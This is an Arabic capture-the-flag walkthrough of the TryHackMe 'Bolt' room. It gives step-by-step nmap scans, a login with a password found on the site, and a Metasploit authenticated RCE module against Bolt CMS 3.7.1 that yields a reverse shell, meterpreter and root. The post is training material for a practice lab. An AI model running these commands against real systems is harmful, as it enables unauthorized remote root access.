Search 🔎🖥️

TryHackMe|Bolt WriteUp\Walkthrough (Arabic)

بسم الله

اللي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط:

رابط التحدي: https://tryhackme.com/r/room/bolt

===============================================================

كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe

أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap

sudo nmap IP -vv

طلع معانا 3 بورتات مفتوحة 22 و80 و8000، نرجع نسوي Aggressive سكان على نفس هذه البورتات.

sudo nmap IP -vv -A -p 80,22,8000

بورت 22 عليها SSH server وبما إن ما عندنا أي معلومات نستخدمها للدخول باستخدامه فبنركز على البورتات الباقية. 

طلع معانا إن البورتات 8000 و 80 موجود عليها web server، نزور هذه الصفحات بالمتصفح، بورت 80 موجود عليها الصفحة الرئيسية لـApache server. أما بورت 8000 موجود عليها CMS اسمه Bolt. 

*ملاحظة:

CMS واللي هي Content Management Systems

هي أنظمة تساعد المستخدمين يسوون، ويديرون، ويعدلون على مواقع إنترنت، بدون ما يكون عندهم معرفة كبيرة بالبرمجة، أو حتى ما يكون عندهم معرفة إطلاقًا، مثال عليها WordPress.

بالعادة لما نلاقي CMS أول معلومة نحاول نحصل عليها هي النسخة للنظام، أحيان تكون النسخة (Version) قديمة وفيها ثغرات ممكن اختراقها، وبالعادة يكون رقم النسخة موجود في الصفحة في إحدى الزوايا بالأسفل أو بالأعلى.

في الصفحة الرئيسية ما لقينا رقم النسخة، ولكن فيه رسالتين، رسالة Message for IT Departement أعطاني فيها كلمة السر مباشرة، فناخذها ونخزنها عندنا. 


الحين اللي نبيه نبي نسجل دخول، لكن وين صفحة تسجيل الدخول؟؟

صفحة تسجيل الدخول بتكون على المسار 
http://IP:8000/bolt/login
اسم المستخدم هو bolt وكلمة السر هي نفسها اللي حصلنا عليها من الرسالة.
إذا دخلنا على النظام بنلقى علطول رقم النسخة في الزاوية اليسار بالأسفل.


نروح على قوقل ونبحث 

bolt 3.7.1 exploit

وبيطلع معانا أكثر من صفحة، إحداها Rapid7، وهذا شيء جدا ممتاااز، لأن Rapid7 هو الموقع اللي يطور بالـmetasploit فمعناته فيه module جاهزة لاختراقه :).

هذا الرابط للـexploit 
Rapid7Exploit
 
نرجع للتيرمينال ونشغل metasploit
msfconsole 
بعدين ندخل الـmodule 
use exploit/unix/webapp/bolt_authenticated_rce
نشوف الـoptions باستخدام الكوماند options
يحتاج نعدل على rhosts و password و username و lhost

set lhost tun0
tun0 هي الـinerface للـopenVPN connection
set rhosts IP
set username bolt
set password ********
الحين كل شيء جاهز معاي فنشغل الـexploit
exploit


بنحصل على shell وأنا أبغى أحصل على meterpreter session لأنها أسهل بالاستخدام، ولها مميزات عديدة

بأسوي background عن طريق إني أضغط ctrl+z بعدين 

sessions -u 1

عشان يسوي upgrade للجلسة رقم 1، نعطيه وقت وثم بنحصل على meterpreter session، ندخل عليها باستخدام 

sessions 2

بعدين

shell

/bin/bash -i

وبنحصل على shell كـroot، وبنبحث في جميع الملفات عن الفلاق

find / -name "flag.txt"

بيطلع موجود في المسار 

/home/flag.txt

نستعرضه باستخدام cat وبكذا حصلنا عليه ✨


وهذه إجابات الأسئلة الموجودة في TryHackMe باستثناء كلمة السر والفلاق :)



هنا سأل عن رقم الـexploit من exploit-db
تذكرون البحث اللي بحثناه فوق، نفسه نبحثه ونفتح صفحة exploit.db وهذا رابطها وعلطول بنلاقي exploit-db number

وبكذا يكون انتهينا من الحل، بالتوفيق لكم 😊

Comments

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

eJPTv2 Exam Review (Arabic)

TryHackMe|Blueprint WriteUp\Walkthrough (Arabic)